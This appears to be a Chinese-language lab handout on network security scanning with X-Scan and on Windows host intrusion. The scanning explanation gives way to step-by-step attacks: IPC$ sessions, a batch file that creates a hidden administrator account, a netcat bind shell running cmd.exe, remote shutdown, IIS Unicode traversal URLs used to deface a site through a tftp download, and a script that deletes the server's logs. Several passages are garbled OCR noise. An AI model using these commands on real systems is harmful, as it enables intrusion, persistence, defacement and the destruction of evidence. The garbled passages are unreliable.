網(wǎng)絡(luò)安全掃描器及漏洞的入侵掃描

1、單元三網(wǎng)絡(luò)系統(tǒng)的安全配置與管理項(xiàng)目五 網(wǎng)絡(luò)安全掃描器及漏洞的入侵掃描教學(xué)目標(biāo)了解安全掃描的的原理、作用和網(wǎng)絡(luò)掃描工具X-scan、Superscan的主要原理；熟練掌握X-Scan、Superscan掃描器的使用，實(shí)現(xiàn)屏幕監(jiān)視和控制和遠(yuǎn)程執(zhí)行命令；掌握主機(jī)入侵方式及基于Unicode漏洞的入侵，提高計(jì)算機(jī)安全方面的安全隱患意識。教學(xué)要求認(rèn)真聽講，專心操作，操作規(guī)范，認(rèn)真記錄實(shí)驗(yàn)過程，總結(jié)操作經(jīng)驗(yàn)和寫好實(shí)驗(yàn)報(bào)告，在實(shí)驗(yàn)中培 養(yǎng)嚴(yán)謹(jǐn)科學(xué)的實(shí)踐操作習(xí)慣；遵守學(xué)校的實(shí)驗(yàn)室紀(jì)律，注意人身和設(shè)備的安全操作，愛護(hù)實(shí)驗(yàn)設(shè)備、及時(shí)上繳作業(yè)；教學(xué)環(huán)境：Windows 7以及Windows server2003/2

2、008以上操作系統(tǒng)。知識要點(diǎn)了解安全掃描的的原理、作用；理解網(wǎng)絡(luò)掃描工具X-scan、Superscan的主要原理。；技術(shù)要點(diǎn)熟練掌握X-Scan、Superscan掃描器的使用，實(shí)現(xiàn)屏幕監(jiān)視和控制和遠(yuǎn)程執(zhí)行命令。掌握主機(jī)入侵方式及基于Unicode漏洞的入侵，提高計(jì)算機(jī)安全方面的安全隱患意識。技能訓(xùn)練講授與示范正確啟動(dòng)計(jì)算機(jī)，在最后一個(gè)磁盤上建立以學(xué)號為名的文件夾，從指定的共享文件夾中將“實(shí)習(xí)指導(dǎo)書” 和其他內(nèi)容復(fù)制到該文件夾中。（一）安全掃描的原理作用1）自動(dòng)檢測遠(yuǎn)程或本地主機(jī)安全脆弱點(diǎn)的程序；2）采用模擬攻擊的形式對目標(biāo)可能存在的已知安全漏洞進(jìn)行逐項(xiàng)檢查；3）并不是一個(gè)直接的攻擊網(wǎng)絡(luò)漏洞

3、的程序；功能發(fā)現(xiàn)一個(gè)主機(jī)和網(wǎng)絡(luò)的能力；一旦發(fā)現(xiàn)一臺主機(jī)，有發(fā)現(xiàn)什么服務(wù)正運(yùn)行在這臺主機(jī)上的能力；通過測 試這些服務(wù)，發(fā)現(xiàn)這些漏洞的能力。（二）端口掃描掃描器主要可分為基于主機(jī)的和基于網(wǎng)絡(luò)的兩種。真正的掃描器是TCP端口掃描器，可以連通TCP/IP端口和服務(wù)（比如，Telnet或FTP），并記錄目標(biāo)的 回答，搜集到關(guān)于目標(biāo)主機(jī)的有用信息。TCP SYN 掃描原理：掃描程序發(fā)送的SYN數(shù)據(jù)包，準(zhǔn)備打開一個(gè)新的連接并等待反映：一個(gè)SYN|ACK的返回信息表示 端口處于偵聽狀態(tài)，一個(gè)RST返回表示端口沒有處于偵聽狀態(tài)。優(yōu)點(diǎn)：不會在目標(biāo)計(jì)算機(jī)上留下紀(jì)錄。缺點(diǎn)：掃描程序必須要有root權(quán)限才能建立自己的S

4、YN數(shù)據(jù)包。TCP connect()掃描原理：利用操作系統(tǒng)提供connect()系統(tǒng)調(diào)用，與每一個(gè)感興趣的目標(biāo)計(jì)算機(jī)的端口進(jìn)行連接，若端口 處于偵聽狀態(tài)，那么connect()就能成功。優(yōu)點(diǎn)：系統(tǒng)中的任何用戶都有權(quán)利使用這個(gè)調(diào)用；缺點(diǎn)：很容易被發(fā)現(xiàn)，目標(biāo)計(jì)算機(jī)的logs文件會顯示一連串連接和連接出錯(cuò)的消息，并且很快將它關(guān)閉。TCP FIN 掃描原理：利用關(guān)閉的端口會用適當(dāng)?shù)腞ST來回復(fù)FIN數(shù)據(jù)包，而打開的端口會忽略對FIN數(shù)據(jù)包的回復(fù)。優(yōu)點(diǎn)：FIN數(shù)據(jù)包可以不惹任何麻煩的通過。缺點(diǎn)：這種方法和系統(tǒng)的實(shí)現(xiàn)有一定的關(guān)系，有些系統(tǒng)不論是打開的或關(guān)閉的端口對FIN數(shù)據(jù)包都要給 以回復(fù)，這種情況下該

5、方法就不實(shí)用了。掃描工具的應(yīng)用使用X-SCAN掃描局域網(wǎng)主機(jī)原理X-Scan采用多線程方式對指定IP地址段(或單機(jī))進(jìn)行安全漏洞檢測，支持插件功能。掃描計(jì)算機(jī)的 端口、漏洞、某種服務(wù)、某個(gè)協(xié)議、系統(tǒng)密碼，包括：遠(yuǎn)程服務(wù)類型、操作系統(tǒng)類型及版本，各種弱口令漏 洞、后門、應(yīng)用服務(wù)漏洞、網(wǎng)絡(luò)設(shè)備漏洞、拒絕服務(wù)漏洞等20多個(gè)大類。對于多數(shù)已知漏洞，給出了相應(yīng)的 漏洞描述、解決方案及詳細(xì)描述鏈接。通過掃描結(jié)果，可以了解的看到系統(tǒng)哪方面可能出現(xiàn)風(fēng)險(xiǎn)，比如密碼太弱或者黑客可利用的漏洞等，以 便即使采取措施對計(jì)算機(jī)系統(tǒng)進(jìn)行加固。X-Scan的使用任務(wù)1系統(tǒng)弱口令掃描要求：利用X-Scan實(shí)現(xiàn)主機(jī)系統(tǒng)的是否存在

6、NT弱口令(獲取管理權(quán)限)步驟：系統(tǒng)安裝及設(shè)置下載X-Scan，并解壓，運(yùn)行xscan_gui.exe，并且設(shè)置掃描地址“設(shè)置”一“掃描參數(shù)”一指定IP范圍：-54。如圖1所示：設(shè)置NT-Server弱口令全局設(shè)置一掃描模塊一選擇NT-Server等弱口令，如圖2所示。-IE雄,:tltafeACfiBS 外中諉董圖17;Iw并發(fā)掃描及掃描報(bào)告的設(shè)置選擇“并發(fā)掃描”，可以設(shè)置要掃描的最大并發(fā)主機(jī)數(shù)，和最大的并發(fā)線程數(shù)。mm7m=WfeiftS :+: lit-ftB量士井丈主如an Lfct|s=-i Tfial=2i qjcl 球klar*x*!S*u=r|Mf=t-l-i| X選擇掃描報(bào)告

7、，點(diǎn)擊后會顯示在右邊的窗格中，它會生成一個(gè)檢測IP或域名的報(bào)告文件，同時(shí)報(bào)告 的文件類型可以有3種選擇，分別是HTML、TXT、XML。其他設(shè)置及端口設(shè)置有2種條件掃描：1，跳過沒有響應(yīng)的主機(jī)，2，無條件掃描，如圖5。設(shè)置沒有響應(yīng)的主機(jī)：全局設(shè)置一其他設(shè)置一選中“跳過沒有響應(yīng)的主機(jī)”及其他相關(guān)；端口檢測：插件設(shè)置一端口相關(guān)設(shè)置 一 待檢測端口 7,9,13,19,21,22,20. 檢測方式：SYN*4| .聽 | 一 | 岫端口相關(guān)設(shè)置中可以自定義一些需要檢測的端口。檢測方式“TCP”、“SYN”兩種，TCP方式容易被 對方發(fā)現(xiàn)，準(zhǔn)確性要高一些，SYN則相反。 如圖6所示。SNMP相關(guān)設(shè)置用

8、來針對SNMP信息的一些檢測設(shè)置，在監(jiān)測主機(jī)數(shù)量不多的時(shí)候可以全選，如圖7所示;NETBIOS相關(guān)設(shè)置WINDOWS系統(tǒng)的NETBIOS信息的檢測設(shè)置，包括的項(xiàng)目有很多種，根據(jù)實(shí)際需要進(jìn)行選擇，如圖8。也足89 曰. tdSfl.B其恨模|也牛好W=L1H#-盼勺也福瑯-扁RtiWT MjqiTfi 置aW0.Tsifiri5fl :；n：FiKBUDFIM.尊二字典文件設(shè)置是X-SCAN自帶的一些用于破解遠(yuǎn)程賬號所用的字典文件，這些字典都是簡單或系統(tǒng)默認(rèn)的賬號等!申曰檢:圓范圍全局也再掃描相依并枝掃描掃4苗州片KkhiftS-問什設(shè)ELi刷口相關(guān)設(shè)置ENMF相關(guān)也盅HHTE工口混目關(guān)專也，向

9、橙MW膨主拔置:字典矣型字電毯件名匚vs用尸名字也 PTF/碼寧境 FTF用尸名字奧 工MAI枯典 工MAT用戶名手典 NNTI1密阿豐典 mrri1用戶名學(xué)典 FQF3袍磚于曲KEXEC切;h4f -W 11E孫匚用戶毛于典 鄒日耙碼手典 MB用尸名寧奧 mMTF 密典MTF用戶名字貌 WiCES祐碼豐史. (!. w mJc_ mx . d.i c . as a. -ii _l / 1誦定圖9開始掃描-Scan v3.3 GUI文件 設(shè)置也)查看Q0工具(I) Language幫助. Oa 1-胡】心開蛤掃描村Z003主機(jī)j累計(jì)時(shí)間|插件時(shí)間活動(dòng)線程當(dāng)前進(jìn)度圖10掃描過程及掃描結(jié)果掃描結(jié)束

10、以后會自動(dòng)彈出檢測報(bào)告，包括漏洞的風(fēng)險(xiǎn)級別和詳細(xì)的信息，以便我們對對方主機(jī)進(jìn)行詳細(xì)的分析。.1 I-SCiE 7k 1 G!TL I-Sen IfepGrt - lierotsoft Internet EepIdfst日回區(qū)J辨SIrt Ift Lsnw iIiQ 81 IU 1 王 hliwi m5 IT 10鋁云41口令爭 iWEirdSlniw/Crn 爭5 td/E3J ECL IM W- M；蚓=舊查吉明物fcW _F.ii.胃可-主我堂枕T？.偵日.筒斜主。地比 端廿腋景腋員炯布10,L68J84.H4 raihhi(13rp) 第腕坐麗hl9業(yè)1手由.兇 曲r-H下午m ：D嶼s

11、頊irri Tt w也推ww.瘧Max 5神3t5jtI.ME8 JiHES惟詣K勺 i ekks TfiDnJBL JE6. BE. H.W Ml 正喜tSBTMT-名twti?亨 rrtRi LiFte ?;打開“我的電腦”則多了一個(gè)Z盤，即為目標(biāo)主機(jī)的C盤，查找Z盤的指定文件斷開所有的IPC$連接net use */delnet use 目標(biāo)機(jī)地址ipc$del/刪除指定主機(jī)2）建立后門帳號編寫B(tài)AT文件hack.bat，內(nèi)容為：net use sysback 123456/add/帳號和密碼net localgroup administrators sysback /add與目標(biāo)主機(jī)建

12、立IPC$連接復(fù)制文件到目標(biāo)主機(jī)copy hack.bat 192.168.1.Xd$實(shí)現(xiàn)文件hack.bat拷貝到目標(biāo)主機(jī)的D盤查看目標(biāo)主機(jī)時(shí)間：net time 192.168.1.X通過計(jì)劃任務(wù)遠(yuǎn)程主機(jī)執(zhí)行hack.bat文件，根據(jù)目標(biāo)機(jī)的時(shí)間往后推幾分種執(zhí)行:at192.168.1.X 時(shí)間 d:hack.bat運(yùn)行 hack.batnet use */del斷開 IPC$連接驗(yàn)證帳號sysback是否成功建立net use 192.168.1.Xipc$ 123456 /user:sysback說明：若能建立連接則說明管理帳號 sysback ”成功創(chuàng)建3）NC連接操作用到的工具可以

13、是：nc （打開后門程序），前提關(guān)閉殺毒軟件（網(wǎng)上自行下載該工具）建立空連接格式：net use對方 ipipc$ “口令” /user: “用戶名” 例：net use 192.168.0.Xipc$ 123 /user:administrator將后門程序（nc）拷貝到對方計(jì)算機(jī)copy nc.exe、對方 ipadmin$system32（拷貝到system32的原因：是環(huán)境變量path=c:winntsystem32;查看環(huán)境變量：我的電腦 屬性-高 級一環(huán)境變量一系統(tǒng)環(huán)境變量 系統(tǒng)缺省下的路徑%SystemRoot%system32;%SystemRoot%;）例：copy c:nc

14、.exe 06admin$system32查看對方系統(tǒng)當(dāng)前時(shí)間格式：net time對方ip例：net time08定時(shí)啟動(dòng)nc程序根據(jù)第三步時(shí)間之后2, 3分鐘之后，定時(shí)在對方機(jī)子上啟動(dòng)nc程序：例：at對方 IP 10： 00 nc.exe -d -l -p 8082 -e cmd.exe-d： -l： -p：在8082端口上等待的連接；-e cmd.exe：以命令行方式運(yùn)行）；at對方IP：在自己機(jī)子上查看是否執(zhí)行；at :在對方機(jī)子上查看是否執(zhí)行；連接對方的8082端口nc 對方 IP 8082（檢查是否連接對方：ipconfig看本地連接是否為對方IP；添加用戶和組等）關(guān)閉對方計(jì)算機(jī)

15、Shutdown 對方IP T:20 （20秒后自動(dòng)關(guān)閉對方計(jì)算機(jī)）任務(wù)4基于Unicode漏洞的入侵（IIS漏洞）要求：使用Unicode編碼實(shí)現(xiàn)網(wǎng)站“涂鴉”（目標(biāo)系統(tǒng)windows2000）步聚：1）掃描遠(yuǎn)程服務(wù)器運(yùn)用X-scan掃描遠(yuǎn)程服務(wù)器，尋找有漏洞的主機(jī)填好“指定IP范圍”，在“全局設(shè)置”中“掃描模塊”選擇“漏洞檢測腳本”后，進(jìn)行掃描2）制作標(biāo)語使用DreamWewaver制作一個(gè)標(biāo)語網(wǎng)頁，保存為1.htm，內(nèi)容自定義。3）遠(yuǎn)程服務(wù)器的根目錄準(zhǔn)定IE地址輸入：http:/目標(biāo) ip 地址/scripts/.%c0%2f./windows/system32/cmd.exe?/c+di

16、r+c:mmc.gif/sDirectoiy of C:inetpubs.cripts2000-09-23 15:49DiR）.理2000-09-8 15:49 俗 IR ./s加在dir目錄命令后：表示查找指定文件或文件夾的物理路徑dir+ c:mmic.gif:表示在遠(yuǎn)程服務(wù)的C盤中查找mmc.gif文件，該文件在IIS默認(rèn)安裝中，若找到 即可找到WEB根目錄。編碼為 “c1%1c ”或“e0%2f”4）遍歷根目錄下的文件，涂鴉主頁1）漏洞檢測，查找主頁手工檢測IE地址輸入：http:/ 服務(wù)器 IP 地址/scripts/.%c0%2f./windows/system32/cmd.exe

17、?/c+dir +c:inetpubwwwroothttp:/ 目標(biāo) IP/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot主頁名：index.htm, index.html,default.asp,default.htm等工具檢測：X-Scan檢測該漏洞，通過掃描得到/script/.%c1%1c./winnt/system32/cmd.exe?/c+dir2）上傳自制主頁下載Tftpd32工具，運(yùn)行tftpd32服務(wù)器，只需將自制頁面1.htm復(fù)制到tftpd服務(wù)器的路徑下即可：格式：Tftp-ihostGETP

18、UT souresdestination參數(shù)：-i二進(jìn)制文件傳輸；host是Tftp服務(wù)器地址；get指下載文件；put指上傳文件；Source指文 件名；Destination指目的地。例：http:/ 目標(biāo) ip 地址/scripts/.%c0%2f./windows/system32/cmd.exe?/c+tftp+本機(jī) ip + get+1.htm+c:inetpubwwwrootindex.htm。3）重新登錄遠(yuǎn)程主機(jī)的網(wǎng)站，即為1.htm主頁的內(nèi)容4.清除入侵信息入侵者在利用unicode漏洞入侵后，在離開遠(yuǎn)程服務(wù)器前，需要清除服務(wù)器的日志文件BAT文件：del+C:winntsystem32logfiles*.*del+C:winntsystem32config*.evtdel+C:winntsystem32dtclog*.*del+C:winntsystem32*.logdel+C:winntsystem32*.txtdel+C:winnt*.txtdel+C:winnt*.log操作：通過TFTP服